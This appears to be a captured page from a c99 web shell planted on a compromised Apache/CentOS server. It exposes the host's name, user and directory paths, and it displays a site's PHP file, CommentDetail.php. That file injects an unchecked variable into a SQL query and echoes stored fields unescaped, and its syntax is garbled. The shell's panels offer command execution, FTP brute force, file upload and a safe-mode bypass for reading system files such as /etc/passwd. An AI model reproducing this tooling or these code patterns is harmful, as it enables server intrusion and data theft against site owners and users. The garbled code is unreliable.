!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/director/   drwxr-xr-x
Free 52.66 GB of 127.8 GB (41.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     CommentDetail.php (2.7 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**  Define Validate Access  */
define'_VALID_ACCESS');
    
/**  Configuration  */
require_once( "../configuration.php" );
require_once( $_Config_absolute_path "/includes/framework.php" );
require_once( "../include/Function.php" );
        
/**  Create Database Object  */
$dbObj = new DBConn;

$sql " SELECT *  FROM  comment_tb  WHERE Info_code='$Code' ";
$result $dbObj->execQuery($sql);
$rs $dbObj->fetchArray($result);

?>
<html>
<head>
<title>Comment Detail</title>
<link rel="stylesheet" href="../css/default.css" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
</head>

<body>
<table width="650" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td height="8"></td>
  </tr>
</table>
<table width="650" border="0" cellpadding="0" cellspacing="0">
  <tr>
    <td width="650" valign="top"><fieldset>
      <form id="myForm" name="myForm" method="post" action="">
        <table width="98%" border="0" align="center" cellpadding="2" cellspacing="2" bordercolor="#006699" style="border:0px solid gray">
          <tr>
            <td width="14%" height="20" align="right" bordercolor="#003366" class="TEXT-DARK-BLUE10">ËÑÇ¢éÍ</td>
            <td width="3%" bordercolor="#CCCCCC">&nbsp;</td>
            <td width="83%" class="TEXT-CLIMSON10"><strong><?php echo $rs['Info_name'];?></strong></td>
          </tr>
          <tr>
            <td height="20" align="right" valign="top" bordercolor="#003366" class="TEXT-DARK-BLUE10">ÃÒÂÅÐàÍÕ´</td>
            <td bordercolor="#CCCCCC">&nbsp;</td>
            <td valign="top" bgcolor="#F5F9F9"><?php echo $rs['Info_detail'];?></td>
          </tr>
          <tr>
            <td height="20" align="right" bordercolor="#003366" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">ª×èÍ</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF">&nbsp;</td>
            <td bgcolor="#FFFFFF"><?php echo $rs['Info_name'];?></td>
          </tr>
          <tr>
            <td height="20" align="right" bordercolor="#003366" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">àÁÅì</td>
            <td bgcolor="#FFFFFF">&nbsp;</td>
            <td bgcolor="#FFFFFF"><a href="mailto:<?=$rs[Organiz];?>"><?php echo $rs['Organiz'];?></a></td>
          </tr>
        </table>
      </form>
     </fieldset></td>
  </tr>
  <tr>
    <td valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0">
      <tr>
         <td align="center">&nbsp;</td>
      </tr>
      <tr>
         <td align="center"><input type="button" name="Submit" value="»Ô´Ë¹éÒµèÒ§" onClick="javascript:parent.close();" class="CURSOR-HAND WIDTH80" /></td>
      </tr>
    </table></td>
  </tr>
</table>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0143 ]--